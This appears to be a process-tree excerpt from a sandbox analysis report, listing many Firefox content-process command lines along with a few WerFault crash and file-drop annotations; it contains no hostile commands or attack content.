C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.34.855450185\1579607906" -childID 32 -isForBrowser -prefsHandle 5992 -prefMapHandle 8228 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9aed1ae-91e2-4119-a32c-a98ac0bc4549} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 8060 2df9b0ac658 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.35.39793851\1746290420" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 3496 -prefMapHandle 10448 -prefsLen 27380 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {404665af-8473-42b2-9e7a-1305b31ace54} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 8288 2df9dab3358 utility4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.37.2111173726\734154453" -childID 34 -isForBrowser -prefsHandle 10256 -prefMapHandle 10324 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a472be0f-41d1-4c8f-9128-01ff6ecd8d77} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10248 2df9dabbc58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.38.1391890912\1314150679" -childID 35 -isForBrowser -prefsHandle 10576 -prefMapHandle 8032 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0eb73bb8-9dca-45aa-b0a3-78099519f442} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 3764 2df9e10d858 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.36.1356832435\1746410012" -childID 33 -isForBrowser -prefsHandle 5372 -prefMapHandle 5116 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd6237c5-7c91-40cd-9630-b060e40aa1f6} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5084 2df9b12ff58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.39.1219933\549740010" -childID 36 -isForBrowser -prefsHandle 10336 -prefMapHandle 10164 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c4a27a2-b9ae-4bdc-b42f-08f56d3cd5c1} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10112 2df9fcd5958 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.42.1158651063\2022803226" -childID 39 -isForBrowser -prefsHandle 8248 -prefMapHandle 8172 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53e410a2-128b-4f23-a716-584d98056f2e} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5044 2df96e10e58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.41.44785134\1895461939" -childID 38 -isForBrowser -prefsHandle 10552 -prefMapHandle 6020 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8e3bbbb-cb54-4e17-92f7-acf6167324bf} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 1636 2df96e0e758 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.40.1405385811\1950235732" -childID 37 -isForBrowser -prefsHandle 5008 -prefMapHandle 3748 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {806e544a-e719-4a7c-aee0-8462da676f94} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10344 2df96e0e458 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.43.2074424792\948842212" -childID 40 -isForBrowser -prefsHandle 8324 -prefMapHandle 5112 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb0cae50-3d2d-4a64-99d8-077ce46f2cf0} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5272 2dfa1804458 tab4⤵
- Drops file in Program Files directory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.44.1469901485\664120925" -childID 41 -isForBrowser -prefsHandle 8312 -prefMapHandle 3448 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {619c22e9-0ae3-412c-9607-a44435cd19d1} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10560 2dfa17b1258 tab4⤵
- Drops file in Program Files directory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.45.928656909\783309563" -childID 42 -isForBrowser -prefsHandle 9848 -prefMapHandle 9856 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a39eabaa-9dd2-40de-ad7a-2996f6a873de} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 9812 2dfa2199558 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.46.521418546\133479514" -childID 43 -isForBrowser -prefsHandle 6196 -prefMapHandle 5476 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19d9240e-0048-4d0e-b738-1034d1ef7f04} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 6012 2dfa23c1458 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.48.9292951\925668807" -childID 45 -isForBrowser -prefsHandle 9880 -prefMapHandle 6556 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48fa4d97-2410-4a31-8998-98387f670177} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 1620 2df9fcb7258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.49.35284263\1178581212" -childID 46 -isForBrowser -prefsHandle 8104 -prefMapHandle 10100 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8af0fb88-f874-4116-ba2b-b6edf28cf210} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10360 2df9fcb7b58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.47.686060191\2025402563" -childID 44 -isForBrowser -prefsHandle 8212 -prefMapHandle 4428 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a451d0f-3f95-43ac-a758-abf3ab8d7c58} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10116 2df9fcb5758 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.50.1100205319\1552690219" -childID 47 -isForBrowser -prefsHandle 10552 -prefMapHandle 8072 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bafdf794-f0d6-4aa2-b03d-e1142904149e} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 8152 2df8a461358 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.52.1380035865\1935340446" -childID 49 -isForBrowser -prefsHandle 1424 -prefMapHandle 5272 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27b3eb41-3f16-4f65-9657-104a21f46ec7} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5212 2dfa172b258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.53.1741359979\531185526" -childID 50 -isForBrowser -prefsHandle 6580 -prefMapHandle 6564 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4511329-34ba-4faf-a164-5e1dc94a7eb1} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 6592 2dfa1936458 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.51.2106274216\1074206670" -childID 48 -isForBrowser -prefsHandle 4616 -prefMapHandle 5332 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f389d06d-5937-443d-8fd5-c7682638b639} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10296 2dfa172b858 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.54.1301430611\532399288" -childID 51 -isForBrowser -prefsHandle 6160 -prefMapHandle 2860 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb697c4f-d1e5-4090-9b1d-f1f815ada23a} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5244 2df96c54e58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.55.1463915779\952669914" -childID 52 -isForBrowser -prefsHandle 10400 -prefMapHandle 10352 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6eb6f730-5841-4aaf-957e-1b1708a8d46a} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 2860 2df9b28b058 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.57.1883139432\997154862" -childID 54 -isForBrowser -prefsHandle 5340 -prefMapHandle 5568 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c35e1891-57e9-497f-b742-094b0e005b7b} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10236 2df9b712b58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.56.521633394\1203042297" -childID 53 -isForBrowser -prefsHandle 9864 -prefMapHandle 10600 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7a1c2a9-2257-4131-828c-c9565f0323ef} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5476 2df9b70fb58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.58.810344950\295379940" -childID 55 -isForBrowser -prefsHandle 9800 -prefMapHandle 5060 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ef822f7-866c-46b2-8979-18d4fed9d8e1} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5332 2df9ef74858 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.59.252550977\1754731299" -childID 56 -isForBrowser -prefsHandle 5004 -prefMapHandle 5284 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d932201-551f-4e98-be29-deeb146aefd9} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10344 2df9c4bc658 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.62.2015495579\1968937618" -childID 59 -isForBrowser -prefsHandle 10380 -prefMapHandle 6232 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {668432fb-b33f-463d-be55-5d7021a7b45f} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 9732 2df9fcbbb58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.61.1409516977\1815794944" -childID 58 -isForBrowser -prefsHandle 10600 -prefMapHandle 1620 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b37f29a8-b4c6-41f1-9337-af054c388594} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5416 2df9fcb7258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.60.1351317471\1200331480" -childID 57 -isForBrowser -prefsHandle 5208 -prefMapHandle 6256 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {58100894-3cb2-4a3f-877c-fd9119ee8a8b} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5592 2df9fcb6958 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.64.1506495225\1786208412" -childID 61 -isForBrowser -prefsHandle 10352 -prefMapHandle 9668 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0365d913-c1be-48c2-9acd-95517b75a21e} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 8008 2dfa0f99358 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.65.1934653528\1547212540" -childID 62 -isForBrowser -prefsHandle 7676 -prefMapHandle 3496 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce8448c7-78d2-45c2-abf4-fe3fbd3bfce0} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7668 2dfa0f99f58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.63.990804319\230167450" -childID 60 -isForBrowser -prefsHandle 10360 -prefMapHandle 5260 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98945a80-4ad4-4485-8c5a-8428a4e95e31} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 9868 2dfa0f98d58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.67.1412031894\1676000948" -childID 64 -isForBrowser -prefsHandle 5208 -prefMapHandle 6256 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {214d76a9-7438-4408-8c5a-b5a94dcbdde3} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 8164 2dfa2c67058 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.68.1854038313\139182774" -childID 65 -isForBrowser -prefsHandle 10116 -prefMapHandle 5548 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e07cc8c-5b6d-4709-872e-700cc0e9c2c0} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 1400 2dfa2b6b958 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.66.776721953\51304237" -childID 63 -isForBrowser -prefsHandle 5928 -prefMapHandle 9836 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6313f71b-255f-454f-9fce-d1d28b97f936} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7536 2dfa233c458 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.69.732109758\928083911" -childID 66 -isForBrowser -prefsHandle 4368 -prefMapHandle 6568 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68d67465-3e5d-4467-ba2a-9f5b8c81c6b9} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10256 2dfa2c7dd58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.70.1564136410\742934221" -childID 67 -isForBrowser -prefsHandle 9592 -prefMapHandle 10584 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2ae818d-ca9e-4de1-8ced-9b9d224d73a0} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 10024 2df96e0fc58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.73.266975891\751036800" -childID 70 -isForBrowser -prefsHandle 7256 -prefMapHandle 7252 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ffb3c2a8-56f8-405e-9fba-bd11c854965a} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7264 2df99e85458 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.72.1650049137\1760454477" -childID 69 -isForBrowser -prefsHandle 5060 -prefMapHandle 9884 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f23829e-7231-4783-94d8-c3e580669865} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7840 2df99e84b58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.71.1755534979\746722139" -childID 68 -isForBrowser -prefsHandle 10400 -prefMapHandle 6288 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51da4353-759f-4709-be72-fb941d2ebea5} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7440 2df9730fe58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.74.1868077702\1745440444" -childID 71 -isForBrowser -prefsHandle 6168 -prefMapHandle 4728 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6344ad8-7e04-49bc-ac37-99c8b960d688} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5012 2df8a42e458 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.76.227297783\313754397" -childID 73 -isForBrowser -prefsHandle 6248 -prefMapHandle 7180 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f10e4454-65ec-4aef-a749-df93e6e7cec0} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 3576 2dfa10cdf58 tab4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6036 -s 11285⤵
- Program crash
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.77.1349876717\1613663488" -childID 74 -isForBrowser -prefsHandle 5152 -prefMapHandle 4172 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e293634f-2988-470e-9883-b83a45cacfc1} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 1364 2dfa10ce258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.75.476387655\1346017288" -childID 72 -isForBrowser -prefsHandle 4932 -prefMapHandle 3732 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82dbb71d-9327-406e-a6c1-4c14cc6d9c43} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7776 2dfa10ce858 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.79.181835304\1895827845" -childID 76 -isForBrowser -prefsHandle 7396 -prefMapHandle 7400 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {16eafd0a-8d70-41bf-b34d-6e687099205f} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7388 2dfa21bd258 tab4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4436 -s 7165⤵
- Program crash
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.78.634683149\558876318" -childID 75 -isForBrowser -prefsHandle 7232 -prefMapHandle 7516 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1903547b-ba6b-4d89-90d6-ddd184d61634} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 5060 2dfa1cf1e58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.80.1681394608\1266029868" -childID 77 -isForBrowser -prefsHandle 4368 -prefMapHandle 7256 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {055dc8d5-c737-4b84-b8fa-ab851b60c107} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 3368 2df96e4b858 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.81.527678840\505490065" -childID 78 -isForBrowser -prefsHandle 7408 -prefMapHandle 7172 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb8bf63c-b31a-4e30-9818-04b2b55b1859} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7832 2df96e48558 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.82.33934652\134781173" -childID 79 -isForBrowser -prefsHandle 3576 -prefMapHandle 7180 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {336923d1-2db3-48cf-9cac-79d5895ebc4d} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 4728 2dfa1a35258 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.83.996208149\831022469" -childID 80 -isForBrowser -prefsHandle 5064 -prefMapHandle 9944 -prefsLen 27380 -prefMapSize 232675 -jsInitHandle 1492 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c45228c-de46-4756-a42b-5cc827572e68} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 9716 2dfa1a35e58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5496.84.234222570\2006415837" -parentBuildID 20221007134813 -prefsHandle 6996 -prefMapHandle 6992 -prefsLen 27380 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9026e467-84bc-442c-a707-21f9ce2dfe02} 5496 "\\.\pipe\gecko-crash-server-pipe.5496" 7176 2dfa0f9ae58 gpu4⤵
-
